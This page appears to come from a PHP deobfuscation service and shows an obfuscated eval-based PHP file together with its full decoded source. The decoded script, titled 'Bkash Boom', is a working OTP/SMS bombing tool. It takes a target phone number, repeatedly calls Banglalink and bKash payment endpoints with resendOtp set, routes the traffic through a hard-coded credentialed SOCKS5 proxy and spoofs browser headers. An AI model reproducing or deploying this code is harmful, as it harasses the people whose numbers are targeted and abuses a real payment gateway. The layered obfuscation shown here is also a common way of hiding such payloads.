Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $enc = '=EYK38cC1yy8/Bv+2HFdwqyfnp/5vbvP/X04vTr8og3Vr1w1xzBpDYYP2nzNNI+4Y6r5VWVcXMu..
Decoded Output download
?>b'<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Bkash Boom</title><style>body{background-color:black;color:white;padding:20px;font-family:Arial,sans-serif;}.center{text-align:center;}</style></head><body><div class="center"><p></p></div></body></html>
<?php
error_reporting(E_ALL);
ini_set(\'display_errors\', 1);
if(isset($_GET[\'phoneNumber\']) && isset($_GET[\'code\'])) {
$phoneNumber = $_GET[\'phoneNumber\'];
$amount = isset($_GET[\'amount\']) ? (is_numeric($_GET[\'amount\']) ? ($_GET[\'amount\'] > 1500 ? 3 : ($_GET[\'amount\'] < 3 ? 3 : $_GET[\'amount\'])) : 3) : 3;
$code = $_GET[\'code\'];
$number = str_replace([\'-\', \'880\', \'8801\', \' \', \' \'], [\'\', \'0\', \'01\', \'\', \'\'], $phoneNumber);
$expectedCode = "6X9";
if ($code !== $expectedCode) {
echo "<div style=\'text-align:center;\'>Invalid Code</div>";
exit();
}
if (strlen($number) < 11 || strlen($number) > 11) {
echo "<div style=\'text-align:center;\'>Give Valid Number</div>";
exit();
} else {
// echo "Number: $number";
}
} else {
echo "<div style=\'text-align:center;\'>";
echo <<<HTML
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title></title>
<style>
body {
background-color: #000;
color: #fff;
font-family: Arial, sans-serif;
}
.login-box {
position: absolute;
top: 20%; /* Adjusted from 50% */
left: 50%;
transform: translate(-50%, -50%);
text-align: center;
}
.login-box h2 {
margin-bottom: 20px;
}
.user-box {
margin-bottom: 20px;
}
.user-box input,
.user-box textarea {
border: 1px solid #fff;
background: transparent;
padding: 10px;
width: 80%;
margin: 0 auto;
display: block;
color: #fff;
margin-bottom: 10px;
border-radius: 10px; /* Added rounded corners */
spellcheck: true;
}
.user-box label {
display: block;
margin-bottom: 5px;
}
button {
border: none;
background-color: #000;
color: #fff;
padding: 10px 20px;
cursor: pointer;
border-radius: 10px; /* Initial rounded corners */
transition: all 0.3s ease; /* Smooth transition for all properties */
box-shadow: 2px 2px 4px rgba(0, 0, 0, 0.3); /* Add box shadow */
text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.5); /* Add text shadow */
}
/* Button style on hover */
button:hover {
background-color: #ccc;
border-radius: 20px; /* Change to a different rounded type on hover */
box-shadow: 4px 4px 6px rgba(0, 0, 0, 0.3); /* Increase box shadow on hover */
text-shadow: 2px 2px 3px rgba(0, 0, 0, 0.5); /* Increase text shadow on hover */
}
</style>
</head>
<body>
<div class="login-box">
<h2></h2>
<form id="smsForm">
<div class="user-box">
<label for="num">Number:</label>
<input class="input" id="num" type="text" name="num" required maxlength="11" minlength="11">
</div>
<div class="user-box">
<label for="amount">Amount:</label>
<input class="input" id="amount" type="text" name="amount">
</div>
<button type="submit">Send</button>
</form>
</div>
<script src="https://code.jquery.com/jquery-3.6.1.min.js"
integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>
<script>
$(document).ready(function() {
$(\'#smsForm\').submit(function(event) {
event.preventDefault(); // Prevent form submission
var code = "6X9";
var num = $(\'#num\').val();
var amount = $(\'#amount\').val() === "" ? 1 : parseInt($(\'#amount\').val());
// var url = "/bkash/bkash.php?phoneNumber=" + num + "&amount=" + amount + "&code=6X9";
var url = "/bkash.php?phoneNumber=" + encodeURIComponent(num) + "&amount=" + encodeURIComponent(amount) + "&code=" + encodeURIComponent(code);
$.get(url, function(response) {
console.log("Response:", response);
alert("Message sent successfully!");
}).fail(function(xhr) {
console.error("Error:", xhr.statusText);
alert("Failed to send message. Please try again.");
});
});
});
</script>
</body>
</html>
HTML;
exit();
}
// exit();
// http://localhost/bkash/xbkash.php?phoneNumber=019&code=6X9&amount=1
for ($j = 0; $j < floor($amount / 3); $j++) {
$data = array(
\'recharge_data\' => array(
array(
\'mobile_number\' => \'01960876721\',
\'recharge_amount\' => 20
)
),
\'recharge_platform\' => \'eShop\',
\'gateway_id\' => 201
);
$userproxy = \'socks5://PublicX:[email protected]:6969\';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, \'https://web-api.banglalink.net/api/v1/pgw/initiate-payment\');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_PROXY, $userproxy);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, \'POST\');
curl_setopt($ch, CURLOPT_HTTPHEADER, [
\'Accept: application/json, text/plain, */*\',
\'Accept-Language: en-US,en;q=0.9\',
\'Cache-Control: no-cache\',
\'Connection: keep-alive\',
\'Content-Type: application/json\',
\'Origin: https://eshop.banglalink.net\',
\'Pragma: no-cache\',
\'Referer: https://eshop.banglalink.net/\',
\'Sec-Fetch-Dest: empty\',
\'Sec-Fetch-Mode: cors\',
\'Sec-Fetch-Site: same-site\',
\'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0\',
\'sec-ch-ua: "Microsoft Edge";v="123", "Not:A-Brand";v="8", "Chromium";v="123"\',
\'sec-ch-ua-mobile: ?0\',
\'sec-ch-ua-platform: "Windows"\',
]);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
$response = curl_exec($ch);
curl_close($ch);
// echo $response;
$responseArray = json_decode($response, true);
$data = $responseArray[\'data\'];
$webviewUrl = $data[\'webview_url\'];
$urlParams = parse_url($webviewUrl, PHP_URL_QUERY);
parse_str($urlParams, $params);
$paymentId = $params[\'paymentId\'];
$hash = $params[\'hash\'];
$mode = $params[\'mode\'];
$apiVersion = $params[\'apiVersion\'];
// echo "Payment ID: $paymentId<br>";
// echo "Hash: $hash<br>";
// echo "Mode: $mode<br>";
// echo "API Version: $apiVersion<br>";
$data2 = array(
\'paymentId\' => $paymentId,
\'hash\' => $hash,
\'apiVersion\' => $apiVersion,
\'mode\' => $mode
);
$jsonPayload2 = json_encode($data2);
$ch2 = curl_init();
curl_setopt($ch2, CURLOPT_URL, \'https://tc-customer-ui-backend.pgw-tc.pay.bka.sh/hash/validate\');
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch2, CURLOPT_PROXY, $userproxy);
curl_setopt($ch2, CURLOPT_CUSTOMREQUEST, \'POST\');
curl_setopt($ch2, CURLOPT_HTTPHEADER, array(
\'accept: application/json, text/plain, */*\',
\'accept-language: en-US,en;q=0.9\',
\'cache-control: no-cache\',
\'content-type: application/json\',
\'origin: https://payment.bkash.com\',
\'pragma: no-cache\',
\'referer: https://payment.bkash.com/\',
\'sec-ch-ua: "Microsoft Edge";v="123", "Not:A-Brand";v="8", "Chromium";v="123"\',
\'sec-ch-ua-mobile: ?0\',
\'sec-ch-ua-platform: "Windows"\',
\'sec-fetch-dest: empty\',
\'sec-fetch-mode: cors\',
\'sec-fetch-site: cross-site\',
\'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0\'
));
curl_setopt($ch2, CURLOPT_POSTFIELDS, $jsonPayload2);
$response2 = curl_exec($ch2);
curl_close($ch2);
// echo $response2;
for ($k = 0; $k < 3; $k++) {
// Construct JSON payload
$datax = array(
\'paymentId\' => $paymentId,
\'wallet\' => $number,
\'apiVersion\' => $apiVersion,
\'resendOtp\' => true,
);
// Encode the data
$jsonPayload3 = json_encode($datax);
$ch3 = curl_init();
curl_setopt($ch3, CURLOPT_URL, \'https://tc-customer-ui-backend.pgw-tc.pay.bka.sh/wallet/validate\');
curl_setopt($ch3, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch3, CURLOPT_PROXY, $userproxy);
curl_setopt($ch3, CURLOPT_CUSTOMREQUEST, \'POST\');
curl_setopt($ch3, CURLOPT_HTTPHEADER, array(
\'accept: application/json, text/plain, */*\',
\'accept-language: en-US,en;q=0.9\',
\'cache-control: no-cache\',
\'content-type: application/json\',
\'origin: https://payment.bkash.com\',
\'pragma: no-cache\',
\'referer: https://payment.bkash.com/\',
\'sec-ch-ua: "Microsoft Edge";v="123", "Not:A-Brand";v="8", "Chromium";v="123"\',
\'sec-ch-ua-mobile: ?0\',
\'sec-ch-ua-platform: "Windows"\',
\'sec-fetch-dest: empty\',
\'sec-fetch-mode: cors\',
\'sec-fetch-site: cross-site\',
\'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0\'
));
curl_setopt($ch3, CURLOPT_POSTFIELDS, $jsonPayload3);
$response3 = curl_exec($ch3);
if (curl_errno($ch3)) {
// echo \'Error: \' . curl_error($ch3);
echo "Error";
} else {
// echo $response3;
}
curl_close($ch3);
}
}
// echo "<br>Send Done";
// echo "Code sent successfully";
echo "<div style=\'text-align:center;\'>Code Sent Successfully</div>";
exit();
?>'
Did this file decode correctly?
Original Code
<?php
$enc = '=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';
eval(base64_decode(base64_decode('WlhaaGJDZ2lQejRpTG1kNmRXNWpiMjF3Y21WemN5aG5lblZ1WTI5dGNISmxjM01vWjNwcGJtWnNZWFJsS0dkNmFXNW1iR0YwWlNobmVtbHVabXhoZEdVb1ltRnpaVFkwWDJSbFkyOWtaU2h6ZEhKeVpYWW9KR1Z1WXlrcEtTa3BLU2twT3c9PQ=========')));exit;
?>
Function Calls
strrev | 1 |
gzinflate | 3 |
gzuncompress | 2 |
base64_decode | 3 |
Stats
MD5 | 9226179dd0aa8ff1e96f22df975f1761 |
Eval Count | 2 |
Decode Time | 68 ms |